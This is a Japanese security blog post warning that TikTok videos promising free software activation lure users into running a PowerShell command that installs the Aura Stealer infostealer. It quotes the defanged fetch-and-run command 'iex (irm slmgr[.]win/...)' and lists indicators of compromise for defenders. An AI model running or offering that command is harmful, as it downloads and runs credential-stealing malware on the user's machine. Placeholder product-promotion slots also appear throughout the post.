【緊急警告】TikTok動画を悪用したClickFix攻撃でAura Stealerマルウェアが拡散中 – 無料アクティベーション詐欺の実態と対策

フォレンジックアナリストとして数多くのマルウェア感染事例を調査してきましたが、最近特に警戒すべき攻撃手法が確認されています。TikTok動画を悪用した「ClickFix攻撃」により、Aura Stealerと呼ばれる情報窃取型マルウェアが拡散されているのです。

TikTok動画を悪用したClickFix攻撃の手口

この攻撃の特徴は、WindowsやMicrosoft 365、Adobe Premiere・Photoshop、CapCut Pro、Discord Nitroなどの人気ソフトウェアの「無料アクティベーション」を謳うTikTok動画を使用することです。

動画内では、以下のようなPowerShellコマンドの実行を促します:

iex (irm slmgr[.]win/<製品名>)

一見すると簡単な裏技のように見えるため、多くのユーザーがコマンドをコピー&ペーストしてしまいます。しかし、これこそが巧妙に仕組まれた罠なのです。

マルウェア感染までの攻撃フロー

実際の攻撃は以下のステップで進行します:

  1. PowerShellコマンド実行:ユーザーが動画の指示通りにコマンドを実行
  2. 追加スクリプト取得:PowerShellがslmgr[.]winに接続し、さらなるスクリプトを取得
  3. マルウェアダウンロード:Cloudflare Pages上のホストから2つの実行ファイルをダウンロード
    • updater.exe:Aura Stealerの亜種
    • source.exe:.NETコンパイラを使用したメモリ内実行
  4. 情報窃取開始:Aura Stealerが各種認証情報を収集・送信

Aura Stealerが狙う情報とは

私がフォレンジック調査で確認したAura Stealerの被害事例では、以下のような情報が窃取されています:

  • ブラウザに保存されたID・パスワード
  • 認証クッキー
  • 暗号資産ウォレット情報
  • 各種アプリケーションの資格情報
  • セッショントークン

特に深刻なのは、ある中小企業で発生した事例です。従業員が個人のPCでこの攻撃に遭い、業務で使用していたクラウドサービスの認証情報が窃取されました。攻撃者はその情報を使って企業のデータにアクセスし、機密情報の漏洩が発生したのです。

ClickFix攻撃が検知困難な理由

ClickFix攻撃が特に危険なのは、従来のセキュリティ対策をすり抜けやすい点にあります:

  • ユーザー自身の操作:被害者が自らコマンドを実行するため、通常のEDRでは検知が困難
  • 正規サービスの悪用:Cloudflare PagesやPowerShellなど、正規サービスを悪用するため誤検知との判別が困難
  • 動画による誘導:プラットフォーマーの自動検知を回避しやすい

実際、私が調査した企業では、アンチウイルスソフト 0を導入していたにも関わらず、初期段階での検知ができませんでした。これは、攻撃手法の巧妙さを物語っています。

感染が疑われる場合の緊急対応手順

もしこの攻撃に遭った可能性がある場合、以下の手順で迅速に対応してください:

1. 即座に行うべき対応

  • すべてのオンラインサービスのパスワードを変更
  • 可能なサービスでは多要素認証(MFA)を有効化
  • 重要なセッション(Webメール、クラウド管理コンソール等)から強制ログアウト

2. システムの点検と清浄化

  • アンチウイルスソフト 0でフルスキャンを実行
  • 挙動が不審な場合は、クリーンインストールを検討
  • PowerShellの実行履歴を確認

予防策と組織的対策

個人ユーザーの場合、以下の対策が効果的です:

  • アンチウイルスソフト 0の導入:最新の脅威に対応した総合的なセキュリティ対策
  • VPN 0の使用:ネットワーク通信の暗号化と匿名化
  • PowerShellコマンドの実行禁止:不審なコマンドは絶対に実行しない

企業においては、より高度な対策が必要です:

  • EDR/AVでのPowerShell実行監視強化
  • DNS/プロキシでの不審ドメイン(slmgr[.]win、*.pages[.]dev)の監視
  • 従業員教育の徹底(コピー&ペースト禁止ポリシー)
  • Webサイト脆弱性診断サービス 0による定期的な脆弱性点検

IoC(侵害指標)情報

以下の情報を監視・ブロック対象として設定することを推奨します:

  • ドメイン:slmgr[.]win
  • ダウンロード先:file-epq[.]pages[.]dev/updater.exe、source.exe
  • コマンド例:iex (irm slmgr[.]win/<製品名>)
  • 典型的TTP:PowerShell経由のスクリプト取得→実行ファイル2本の取得→Aura Stealer実行

まとめ:継続的な警戒が必要

TikTok動画を悪用したClickFix攻撃は、ソーシャルエンジニアリング攻撃の新たな進化形です。フォレンジック調査の現場では、この手法による被害が急増しており、特に個人ユーザーや中小企業での感染事例が目立ちます。

重要なのは、「無料で高価なソフトウェアが使える」という甘い話には必ず裏があるということです。正規のライセンスを購入し、信頼できるアンチウイルスソフト 0VPN 0を活用して、自身のデジタル資産を守りましょう。

また、企業においてはWebサイト脆弱性診断サービス 0を定期的に実施し、従業員教育を継続することで、このような巧妙な攻撃から組織を守ることができます。

一次情報または関連リンク

TikTok videos continue to push infostealers in ClickFix attacks

タイトルとURLをコピーしました